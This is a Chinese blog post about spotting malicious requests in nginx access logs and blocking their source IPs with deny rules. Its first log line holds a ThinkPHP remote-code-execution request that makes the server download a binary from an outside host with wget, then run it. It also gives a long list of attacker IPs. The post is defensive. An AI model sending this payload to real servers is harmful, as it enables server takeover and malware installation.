找到具有明显特征的访问记录,比如:

156.203.12.198 -[/Dec/::: +] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1"   "-" "Ouija_x.86/2.0" "-"

也许是某个开源框架的漏洞,执行参数上带的方法,达到下载指定文件然后执行的目的,由于危险性,所以 shell_exec 这类函数默认在 php.ini 是禁用的。

匹配特征找出不重复的 IP,写入文件:

$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips

编辑一个 nginx 配置,加入到 location 访问中:

$ cat blockips > /etc/nginx/conf.d/blockips.conf

location / {
    include /etc/nginx/conf.d/blockips.conf
    xxxx;
}

编辑 blockips.conf,行首加 "deny ",行尾加 ";"

%s/^/deny /g

%s/$/\;/g

重载 nginx,这些 IP 访问就是403:

# 宿主机模式

$ nginx -s reload

# Docker模式

$ docker-compose restart nginx

附一份恶意访问IP:

deny 156.194.121.215;

deny 156.195.107.210;

deny 156.195.39.140;

deny 156.195.45.250;

deny 156.196.146.114;

deny 156.196.17.47;

deny 156.196.229.206;

deny 156.196.6.26;

deny 156.198.62.131;

deny 156.200.245.40;

deny 156.201.18.181;

deny 156.202.190.62;

deny 156.202.251.75;

deny 156.202.76.2;

deny 156.202.84.179;

deny 156.203.12.198;

deny 156.203.210.142;

deny 156.203.244.51;

deny 156.203.7.75;

deny 156.205.251.198;

deny 156.205.81.35;

deny 156.206.136.3;

deny 156.206.182.152;

deny 156.206.187.73;

deny 156.206.231.65;

deny 156.207.242.8;

deny 156.208.42.167;

deny 156.209.137.91;

deny 156.209.40.94;

deny 156.212.251.36;

deny 156.214.142.160;

deny 156.214.43.68;

deny 156.217.6.172;

deny 156.217.9.164;

deny 156.218.133.186;

deny 156.218.246.73;

deny 156.219.214.185;

deny 156.221.182.18;

deny 156.222.20.232;

deny 157.230.121.160;

deny 167.172.104.251;

deny 192.64.86.141;

deny 197.33.213.164;

deny 197.33.38.103;

deny 197.34.0.63;

deny 197.35.49.18;

deny 197.36.233.108;

deny 197.36.33.241;

deny 197.36.4.226;

deny 197.36.60.220;

deny 197.40.152.66;

deny 197.41.192.255;

deny 197.41.76.25;

deny 197.42.153.234;

deny 197.43.203.16;

deny 197.46.143.130;

deny 197.46.88.69;

deny 197.52.120.153;

deny 197.52.86.59;

deny 197.53.154.219;

deny 197.57.10.160;

deny 197.58.107.10;

deny 197.61.10.30;

deny 197.61.18.238;

deny 197.61.62.151;

deny 197.62.106.69;

deny 197.63.152.246;

deny 41.232.65.205;

deny 41.233.204.74;

deny 41.235.104.130;

deny 41.236.148.6;

deny 41.236.3.171;

deny 41.238.205.186;

deny 41.238.34.214;

deny 41.35.143.95;

deny 41.36.168.29;

deny 41.36.196.47;

deny 41.36.20.93;

deny 41.36.221.70;

deny 41.40.31.77;

deny 41.42.219.201;

deny 41.42.59.4;

deny 41.43.34.248;

deny 41.44.120.131;

deny 41.45.98.34;

deny 41.46.62.42;

deny 41.47.75.136;

deny 80.10.22.62;

deny 95.14.156.128;
deny 156.196.181.71;

deny 156.196.191.37;

deny 156.196.197.156;

deny 156.196.3.62;

deny 156.197.229.125;

deny 156.201.133.105;

deny 156.201.98.17;

deny 156.202.112.54;

deny 156.202.152.246;

deny 156.202.31.234;

deny 156.202.39.255;

deny 156.203.54.61;

deny 156.203.96.174;

deny 156.204.165.223;

deny 156.205.169.68;

deny 156.206.214.19;

deny 156.208.49.5;

deny 156.208.51.140;

deny 156.209.187.210;

deny 156.209.35.200;

deny 156.212.44.77;

deny 156.213.35.145;

deny 156.216.156.144;

deny 156.218.136.219;

deny 156.219.45.190;

deny 156.220.186.189;

deny 156.221.230.75;

deny 156.221.8.69;

deny 182.64.156.46;

deny 197.33.205.142;

deny 197.33.214.152;

deny 197.33.99.150;

deny 197.34.177.145;

deny 197.35.113.116;

deny 197.35.85.109;

deny 197.36.186.126;

deny 197.36.19.18;

deny 197.37.180.73;

deny 197.38.244.62;

deny 197.40.184.150;

deny 197.40.238.169;

deny 197.41.112.15;

deny 197.41.178.87;

deny 197.41.86.1;

deny 197.43.220.39;

deny 197.45.9.234;

deny 197.46.71.54;

deny 197.47.108.224;

deny 197.47.221.54;

deny 197.52.165.67;

deny 197.54.42.198;

deny 197.56.28.28;

deny 197.56.59.108;

deny 197.57.167.86;

deny 197.57.219.86;

deny 197.59.221.148;

deny 197.61.186.6;

deny 197.61.85.58;

deny 197.62.227.36;

deny 197.63.13.29;

deny 197.63.205.232;

deny 41.232.17.135;

deny 41.232.27.153;

deny 41.234.133.17;

deny 41.235.102.192;

deny 41.235.244.63;

deny 41.236.223.4;

deny 41.236.56.8;

deny 41.237.33.100;

deny 41.239.135.65;

deny 41.239.77.234;

deny 41.42.35.168;

deny 41.42.59.130;

deny 41.45.30.236;

deny 41.46.236.128;

deny 41.46.255.174;
deny 141.98.80.117;

deny 141.98.80.42;

deny 185.153.196.48;

deny 185.153.198.163;

deny 185.153.199.3;

deny 185.156.177.10;

deny 193.106.31.202;

deny 193.188.22.123;

deny 193.188.22.187;
deny 193.188.22.234;

deny 193.188.22.76;

deny 193.188.23.25;
deny 39.107.142.5;

deny 41.216.186.89;

deny 45.141.86.144;

deny 46.161.27.112;

Link:https://www.cnblogs.com/farwish/p/12080630.html

使用 Nginx 阻止恶意 IP 访问的更多相关文章

  1. 服务器安全策略之《通过IP安全策略阻止某个IP访问的设置方法》

    现在我们在布署好了一个网站,发布到外网后就意味着将会接受来自四面八方的黑客攻击,这个情况很常见,我们的网站基本上每天都要接受成千上万次的攻击,有SQL注入的.有代码注入的.有CC攻击等等...而我作为 ...

  2. nginx拒绝国外IP访问

    nginx拒绝国外IP访问方法很多,比如iptables,geoip模块,域名解析等等.这些方法不会相互冲突,可以结合起来一起使用. 今天来教大家利用两个小方法解决  域名解析禁止掉海外IP访问网站. ...

  3. Nginx 拒绝指定IP访问

    来源 : http://www.ttlsa.com/nginx/nginx-deny-ip-access/   闲来无事,登陆服务器,发现有个IP不断的猜测路径.试图往服务器上传文件(木马).于是查看 ...

  4. nginx限制恶意IP处理方法

    思考了几种方案,最终考虑使用ip黑名单的方式: 处理方法: 一.nginx黑名单方式: 1.过滤日志访问API接口的IP,统计每10分钟调用超过100次的IP,直接丢进nginx的访问黑名单 2.具体 ...

  5. Nginx禁止使用ip访问,只允许使用域名访问

    Nginx虚拟主机配置,vhosts下面有很多域名的配置: [root@external-lb01 vhosts]# pwd/data/nginx/conf/vhosts [root@external ...

  6. nginx 禁止某IP访问

    首先建立下面的配置文件放在nginx的conf目录下面,命名为blocksip.conf: deny 95.105.25.181; 保存一下. 在nginx的配置文件nginx.conf中加入:inc ...

  7. Nginx禁止使用IP访问

    在nginx的访问日志中,会出现只显示IP,而不出现域名的情况,在经过尝试之后,是因为没有设置禁止IP访问导致的. 下面就是在配置文件中设置禁止IP访问,来实现日志文件中$host显示域名. vim ...

  8. Nginx 如何限定IP访问

    在nginx.conf中的server限制段中.deny IP.表示需要限制该IP不可访问.allow IP表示权该IP可以访问. 如上图.表示阻止192.168.1.122的IP的访问.那当然也可以 ...

  9. 分享:linux系统如何快速阻止恶意IP地址

    可能你想要在各种情形下阻止有人通过IP地址访问你的Linux系统.比如说,作为最终用户,你可能想要保护自己,避免已知的间谍软件或跟踪者的IP地址.或者如果你在运行P2P软件,可能想要把来自与违反P2P ...

随机推荐

  1. 使用 Express Generator快速创建Express应用

    全局安装express-generator npm install express-generator -g 根据需求生成自己需要的模板 生成ejs模板:express demo --view=ejs ...

  2. HDU6625: three arrays (字典树处理xor)

    题意:给出A数组,B数组,你可以对A和B分别进行重排列,使得C[i]=A[i]^B[i]的字典序最小. 思路:对于这类题,显然需要建立字典树,然后某种形式取分治,或者贪心.  假设现在有了两颗字典树A ...

  3. ssm上传文件

    ssm上传文件(上传到本地磁盘) (1)先要导入所需要的jar包或者pom文件中添加依赖 <!-- 上传 --> <dependency> <groupId>com ...

  4. Ofbiz项目学习——阶段性小结——服务返回结果

    一.返回成功 1.在.DispatcherReturnDemoService类中编写服务[returnSuccess],内容如下: /** * 返回成功结果 * @param dctx * @para ...

  5. 2017EC Final L SOS——找规律&&博弈

    题意 有n个格子排成一行,两人轮流填,可填入"S"或"0",先得到"SOS"的人胜:如果全部填完也没有出现"SOS",则 ...

  6. AlwaysInstallElevated提权

    前言:自己在学习3gstudent的AlwaysInstallElevated提权的文章中,他说过由于Metasploit的某些原因会导致权限不够,所以自己就尝试去复现其他的两种方法了,详细的文章参考 ...

  7. 项目(1-1)ES32获取mpu9250数据网页交互显示

    教程 https://www.hackster.io/donowak/esp32-mpu9250-3d-orientation-visualisation-467dc1 项目地址 https://gi ...

  8. JVM笔记搬迁

      JVM GC方式 回收对象 引用计数算法 可达性分析算法 引用类型 监控命令 回收算法 GC收集器 分代收集 JVM HotSpot VM https://www.cnblogs.com/lfs2 ...

  9. CSP2019心路历程

    --人常说无论做什么都不要忘了初心,但如果一个人从来没有"应该"去忘了初心,又从何谈起的初心. CSP开考前,风吹在脸上,一些淡淡的回忆化作影子碎在地上:是到了一个令人感伤的路口了 ...

  10. 014_matlab读取ecxel(直接导入)

    视频教程:https://v.qq.com/x/page/c3039b5htwx.html 资料下载:https://download.csdn.net/download/xiaoguoge11/12 ...